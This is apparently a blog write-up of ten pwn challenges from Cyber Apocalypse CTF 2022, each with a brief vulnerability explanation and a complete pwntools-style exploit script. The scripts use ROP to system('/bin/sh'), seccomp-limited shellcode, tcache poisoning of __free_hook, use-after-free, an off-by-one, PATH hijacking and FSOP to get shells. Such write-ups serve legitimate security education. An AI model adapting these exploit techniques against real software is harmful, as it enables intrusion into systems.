This is my write-up for all pwn challenges in Cyber-Apocalypse-CTF-2022, I had solved all tasks in two days. Anyway, these pwn challenges are not very hard…
Please leave a message or send me an email if you have any questions about the wp.
1-Entrypoint
vulnerability
In check_pass
:
data:image/s3,"s3://crabby-images/26839/268398b29ab872778ad2f6f46d25ebec4f6f93a3" alt="image-20220520003600243"
Look at the if condition
about strncmp
, you can input anything except 0nlyTh30r1g1n4l
to call open_door
, in which function you can get flag:
data:image/s3,"s3://crabby-images/6b8b3/6b8b39d1f1c53b29426f55e25d5833c029cc54a9" alt="image-20220520003904550"
EXP
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
|
#!/usr/bin/python3
# -*- encoding: utf-8 -*-
# author: roderick
from pwncli import *
cli_script()
io: tube = gift['io']
elf: ELF = gift['elf']
libc: ELF = gift['libc']
sla("> ", "2")
sa("[*] Insert password: ", "wtf")
ia()
|
data:image/s3,"s3://crabby-images/16601/166010d8d21d16586a749b83db9718d70c7470d5" alt="image-20220520004008085"
2-SpacepirateGoingDeeper
vulnerability
data:image/s3,"s3://crabby-images/e3ec3/e3ec356716e11ec7acc2d45efb75c9c45c1cb0c9" alt="image-20220520004212542"
It’s too easy to get flag…just input DRAEGER15th30n34nd0nly4dm1n15tr4t0R0fth15sp4c3cr4ft\x00
EXP
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
|
#!/usr/bin/python3
# -*- encoding: utf-8 -*-
# author: roderick
from pwncli import *
cli_script()
context.update(timeout=10)
io: tube = gift['io']
elf: ELF = gift['elf']
libc: ELF = gift['libc']
sla(">> ", "2")
sa("Username: ", "DRAEGER15th30n34nd0nly4dm1n15tr4t0R0fth15sp4c3cr4ft\x00")
ia()
|
data:image/s3,"s3://crabby-images/8c72a/8c72afe6600a8551bf2644712024a24dc3b6c68f" alt="image-20220520004346069"
3-Retribution
A basic stack overflow challenge.
checksec
data:image/s3,"s3://crabby-images/b0c28/b0c2801483a3d7a5e63bdeb455db3fb35681e41b" alt="image-20220520004714145"
vulnerability
stack overflow:
data:image/s3,"s3://crabby-images/63710/63710372e8b015abfd6071c370f84b7d600f7324" alt="image-20220520004648625"
steps of solution:
- leak address of glibc using
printf
- use
rop
to get shell
EXP
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
|
#!/usr/bin/python3
# -*- encoding: utf-8 -*-
# author: roderick
from pwncli import *
cli_script()
io: tube = gift['io']
elf: ELF = gift['elf']
libc: ELF = gift['libc']
sla(">> ", "2")
sa("y =", "a"*8)
m = rls("[*] New coordinates")
log_ex(m)
code_base = u64_ex(m[-6:]) - 0xd70
log_address("code addr", code_base)
set_current_code_base(code_base)
sa("(y/n):", flat({
88: [
code_base + 0x0000000000000d33,
code_base + 0x202F90,
elf.plt.puts,
code_base + 0xa22
]
}))
set_current_libc_base_and_log(recv_current_libc_addr(), offset='puts')
sa("y =", "a"*8)
sa("(y/n):", flat({
88: [
code_base + 0x0000000000000d33,
libc.search(b"/bin/sh").__next__(),
libc.sym.system
]
}))
ia()
|
data:image/s3,"s3://crabby-images/1fa96/1fa96d589b2b2c7c07f9d9b993b927e4fe6eae83" alt="image-20220520004858277"
4-Vault-breaker
A trick of strcpy
vulnerability
data:image/s3,"s3://crabby-images/7c60c/7c60c6cf7a8571c8be9c1585ebcc686baac1b9c9" alt="image-20220520005030386"
A NULL
character would be appended at the end of the dst
string in strcpy
Use this tip to make random_key
to become ?\x00\x00\x00....\x00
, and then in the function secure_password
:
data:image/s3,"s3://crabby-images/e5356/e53562a345d26e265ef2d3683b004bb8d77041f9" alt="image-20220520005359834"
every byte of the flag xor with every byte of the key, we know x ^ 0 = x
, so it puts flag if the random_key
consists of NULL
character
EXP
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
|
#!/usr/bin/python3
# -*- encoding: utf-8 -*-
# author: roderick
from pwncli import *
cli_script()
io = gift.io
def genkey(l):
sla("> ", "1")
sla("Length of new password (0-31):", str(l))
ru("New key has been genereated successfully!")
for i in range(31, 0, -1):
genkey(i)
sla("> ", "2")
ru("Master password for Vault: ")
m = ra()
print(m)
ia()
|
data:image/s3,"s3://crabby-images/0c293/0c293b1f4b24cd87f74287693463320af2efb588" alt="image-20220520005744727"
5-FleetManagement
checksec
data:image/s3,"s3://crabby-images/dca80/dca80410d0573aac804926b59016a438cc708e80" alt="image-20220520005954145"
only rt_sigreturn/openat/senfile
are allowed
vulnerability
input 9
to write shellcode
:
data:image/s3,"s3://crabby-images/cbd49/cbd49e8ce0440231eaf0520c66412b9abe9620de" alt="image-20220520010103926"
steps:
openat(-100, "flag.txt", 0)
sendfile(1, 3, 0, 0x30)
EXP
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
|
#!/usr/bin/python3
# -*- encoding: utf-8 -*-
# author: roderick
from pwncli import *
cli_script()
io: tube = gift['io']
data = asm(shellcraft.amd64.pushstr("flag.txt") +
"""
push rsp
pop rsi
mov edi, 0xffffff9c
xor edx, edx
xor eax, eax
xor r10d, r10d
mov eax, {}
syscall
xor edi, edi
xor esi, esi
xchg eax, esi
inc edi
mov r10d, 0x30
mov al, {}
syscall
""".format(constants.SYS_openat, constants.SYS_sendfile))
sleep(3)
sl("1")
io.recvuntil("[*] What do you want to do?", timeout=10)
io.recvuntil("[*] What do you want to do?", timeout=10)
sl("9")
sleep(3)
s(data)
ia()
|
data:image/s3,"s3://crabby-images/72a3f/72a3f98ffa838dc848eca5913b0c8338fc5d75aa" alt="image-20220520010310089"
6-Hellbound
vulnerability
input 1
to leak stack address, and input 3
to assign buf
with *buf
:
data:image/s3,"s3://crabby-images/9d6f7/9d6f7aea3876cc663a7f55d24219aac96e4a7edd" alt="image-20220520200453800"
and there is a backdoor function:
data:image/s3,"s3://crabby-images/749bf/749bff0635d8bc7f217b092d5632f2ea52fe626c" alt="image-20220520200929028"
steps:
- leak stack address
- write the address of backdoor at
retaddr
EXP
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
|
#!/usr/bin/python3
# -*- encoding: utf-8 -*-
# author: roderick
from pwncli import *
cli_script()
io: tube = gift['io']
elf: ELF = gift['elf']
libc: ELF = gift['libc']
def leak():
sla(">> ", "1")
ru("[+] In the back of its head you see this serial number: [")
m = ru("]")
stack_addr = int_ex(m[:-1])
log_address("stack addr", stack_addr)
return stack_addr
def writecode(code):
sla(">> ", "2")
sa("[*] Write some code: ", code)
def deref():
sla(">> ", "3")
ru("The beast went Berserk again!")
sd = leak()
writecode(flat([
0,
sd + 0x50
]))
deref()
writecode(flat([
0x400977, 0
]))
deref()
sla(">> ", str(0x45))
ia()
|
data:image/s3,"s3://crabby-images/3efb5/3efb51a57e7bb85d5baa545fffc416c30903d178" alt="image-20220520201103021"
7-Bon-nie-appetit
checksec
data:image/s3,"s3://crabby-images/227dc/227dcee89a25e7f492ec06600a515c6f16d0e140" alt="image-20220520201428114"
glibc version is Ubuntu GLIBC 2.27-3ubuntu1.5
vulnerability
There is a off by one
vuln in edit_order
, so that you can change the size of the next chunk.
data:image/s3,"s3://crabby-images/636e3/636e3c59638439e5849c16db520fd8392fd87c80" alt="image-20220520201405600"
Steps of my solution:
- leak libc address by means of the remaining address of
bk
of a chunk
- make overlapping chunk using off-by-one
- use
tcache poisoning attack
to allocate a chunk at __free_hook
- change
__free_hook
to system
and free a chunk with /bin/sh
EXP
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
|
#!/usr/bin/python3
# -*- encoding: utf-8 -*-
# author: roderick
from pwncli import *
cli_script()
io: tube = gift['io']
elf: ELF = gift['elf']
libc: ELF = gift['libc']
def new_order(size, data):
sla("> ", "1")
sla("[*] For how many: ", str(size))
sa("[*] What would you like to order: ", data)
def show_order(i):
sla("> ", "2")
sla("[*] Number of order: ", str(i))
def edit_order(i, data):
sla("> ", "3")
sla("[*] Number of order: ", str(i))
sa("[*] New order: ", data)
def dele_order(i):
sla("> ", "4")
sla("[*] Number of order: ", str(i))
def fina():
sla("> ", "5")
new_order(0x18, "a"*0x18)
new_order(0x20, "deadbeef")
new_order(0x10, "a"*0x10)
new_order(0x500, "deadbeef")
new_order(0x10, "/bin/sh\x00")
# leak
dele_order(3)
new_order(0x10, "deadbeef")
show_order(3)
libc_addr = recv_current_libc_addr()
set_current_libc_base_and_log(libc_addr, 0x3ec0d0)
edit_order(0, "a"*0x18+"\x51")
dele_order(2)
dele_order(1)
new_order(0x48, flat({
0x20: [
0, 0x21,
libc.sym.__free_hook
]
}))
new_order(0x10, "a"*0x10)
new_order(0x10, p64(libc.sym.system))
dele_order(4)
ia()
|
data:image/s3,"s3://crabby-images/b2477/b2477a1953cf7562d1230af1d4a117a49baf26c0" alt="image-20220520202139221"
8-TrickorDeal
vulnerability
leak code base address in buy
:
data:image/s3,"s3://crabby-images/17bd0/17bd0d328af4c60c50ff8a77d6e125f194bdb0a2" alt="image-20220520202503869"
uaf
in steal
:
data:image/s3,"s3://crabby-images/f9a1d/f9a1de12a95493a98440dbd59670eab54adecbf5" alt="image-20220520202608565"
and there is a backdoor function:
data:image/s3,"s3://crabby-images/90927/90927dd855d269bebe5a6a55f71b207790cbd592" alt="image-20220520202643679"
step:
- leak code base address
- replace the
printStorage
with unlock_storage
- input
1
to get shell
EXP
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
|
#!/usr/bin/python3
# -*- encoding: utf-8 -*-
# author: roderick
from pwncli import *
cli_script()
io: tube = gift['io']
elf: ELF = gift['elf']
libc: ELF = gift['libc']
sleep(3)
def show():
sla("[*] What do you want to do? ", "1")
def buy(data):
sla("[*] What do you want to do? ", "2")
sa("[*] What do you want!!? ", data)
def offer(i=0, data=None, c='n'):
sla("[*] What do you want to do? ", "3")
sla("[*] Are you sure that you want to make an offer(y/n): ", c)
if c == "y":
sla("How long do you want your offer to be? ", str(i))
sa("[*] What can you offer me? ", data)
@sleep_call_after(5)
def steal():
sla("[*] What do you want to do? ", "4")
buy("a"*0x38)
ru("a"*0x38)
m = rl()
code_base = u64_ex(m[:-1]) - 0x9b0
log_address("code_base", code_base)
steal()
offer(0x50, data=flat_z({
0x40: [code_base + 0xeff]*2
}), c='y')
show()
ia()
|
data:image/s3,"s3://crabby-images/5c1a7/5c1a74d9679228a306a220650ee7f6aab377a7e2" alt="image-20220520202916507"
9-Sabotage
vulnerability
In enter_command_control
, there is a heap overflow:
data:image/s3,"s3://crabby-images/66af3/66af339f3ed21526d9be5a8b26755c2b76098a34" alt="image-20220520203139469"
The difference between putenv
and setenv
in glibc:
putenv
will not allocate memory, it uses the parameter and insert the point you offer into the environment variable list; if the env exists, replace it
setenv
will call malloc
to allocate memory and then copy source string to the new chunk; if the env exists, replace it
When add a new env variable or delete a env variable, realloc
will be called to adjust the memory dynamically.
Note: if there’re two or more environment variables with a same key
in the environment variable list, only the last one is effective!
Steps of getting shell:
- input
2
to call putenv
, and make __environ
(it’s a global variable in glibc) point to the heap area instead of stack area, by the way, write /bin/sh
in /tmp/panel
- input
1
and make use of heap oveflow
to change the content of ACCESS
environment variable, replace it with PATH=/tmp/:/bin:/use/bin
, when call system("panel")
, it will find the executable binary in PATH
, and now /tmp/panel
will be chosen firstly and it will be executed with /bin/sh -c
- when a script don’t specify a interpreter with
#!xxxxx
, every line in the file will be executed with the default shell, which is /bin/sh
EXP
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
|
#!/usr/bin/python3
# -*- encoding: utf-8 -*-
# author: roderick
from pwncli import *
cli_script()
io: tube = gift['io']
elf: ELF = gift['elf']
libc: ELF = gift['libc']
def access(length, code):
sla("> ", "1")
sla("ACCESS code length: ", str(length))
sla("ACCESS code: ", code) # 0 or \n will stop
def quantum(data, data2):
sla("> ", "2")
sla("Quantum destabilizer mount point: ", data)
sla("uantum destablizer is ready to pass a small armed unit through the enemy's shield: ", data2)
def abort():
sla("> ", "5")
quantum("panel", "/bin/sh")
access((1 << 64) - 1, flat({
0x20: "PATH=/tmp:/bin:/usr/bin",
}))
ia()
|
data:image/s3,"s3://crabby-images/61a5d/61a5dc554f8561866834a19f2d5842264b1b1580" alt="image-20220520205924621"
get shell:
data:image/s3,"s3://crabby-images/4dd34/4dd343cd5590ab69c8286d20d5cc9ce38bec08e2" alt="image-20220520210007472"
10-once_and_for_all
It’s a heap challenge about tcache.
checksec
data:image/s3,"s3://crabby-images/a0588/a0588bb3006b36fbf6eeb304666e3308493f7f5b" alt="image-20220520210259084"
vulnerability
UAF
in fix
:
data:image/s3,"s3://crabby-images/171ca/171ca421a9e722e92482a93f0d772889d5c5794c" alt="image-20220520210451158"
My solution:
-
malloc_consolidation to leak glibc address
-
modify tcache->count using fastbin attack
-
tcache unlinking to modify stderr->chain and let it point to a heap chunk
-
prepare a fake _IO_FILE
in heap and use FSOP(make use of _IO_str_finish
) to getshell
EXP
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
|
#!/usr/bin/python3
# -*- encoding: utf-8 -*-
# author: roderick
from pwncli import *
cli_script()
io: tube = gift['io']
elf: ELF = gift['elf']
libc: ELF = gift['libc']
def build_small(idx, size, data="deadbeef"):
sla(">> ", "1")
sla("Choose an index: ", str(idx))
sla("How much space do you need for it: ", str(size))
if size > 0x1f and size <= 0x38:
sa("Input your weapon's details: ",data)
def fix_small(idx, size, data=None, v=2):
sla(">> ", "2")
sla("Choose an index: ", str(idx))
sla("How much space do you need for this repair: ", str(size))
if size > 0x1f and size <= 0x38:
sa("Input your weapon's details: ", data)
sla("What would you like to do now?\n1. Verify weapon\n2. Continue\n>> ", str(v))
# show
def examine_small(idx):
sla(">> ", "3")
sla("Choose an index: ", str(idx))
def build_big(size=0x1000):
sla(">> ", "4")
sla("How much space do you need for this massive weapon: ", str(size))
def giveup():
sla(">> ", "5")
"""
1. malloc_consolidate to leak glibc address
2. modify tcache->count using fastbin attack
3. tcache unlinking to modify stderr->chain to the heap area
4. FSOP: use _IO_str_finish when exit to getshell
"""
build_small(0, 0x30)
build_small(1, 0x30)
fix_small(0, 0x100)
build_big()
examine_small(0)
# leak libc address
libc_base = recv_current_libc_addr() - 0x3ebcd0
set_current_libc_base_and_log(libc_base)
build_small(2, 0x30)
build_small(6, 0x28)
build_small(7, 0x28)
build_small(9, 0x38, "\x00")
build_small(10, 0x28)
build_small(11, 0x38, p64_ex(0)+p64_ex(libc_base + 0x3e8360 - 8)+p64(0)+p64(libc.sym.system)) # _IO_str_jumps
build_small(12, 0x38)
build_small(13, 0x38)
fix_small(6, 0x100)
fix_small(7, 0x100)
fix_small(6, 0x28, p64(libc_base + 0x3ec6e8 - 0x10)) # stderr->chain
fix_small(0, 0x100)
fix_small(1, 0x100)
fix_small(0, 0x30, p64_ex(libc_base + 0x3eb2d0-0x8))
build_small(3, 0x30)
build_small(4, 0x30)
build_small(5, 0x30, flat([0x408, 0x9]))
build_small(8, 0x28, b"deadbeef" + p64(libc.search(b"/bin/sh").__next__()))
giveup()
sleep(1)
sl("cat flag.txt")
ia()
|
data:image/s3,"s3://crabby-images/1d7df/1d7dff98d2ebb8933ba92b043fbd0ead2f075f47" alt="image-20220520211336926"
data:image/s3,"s3://crabby-images/75908/75908ae9ea1ca7bad18249903d43546d6669f009" alt="image-20220520211403147"
Reference
1、My Blog
2、Ctf Wiki
3、pwncli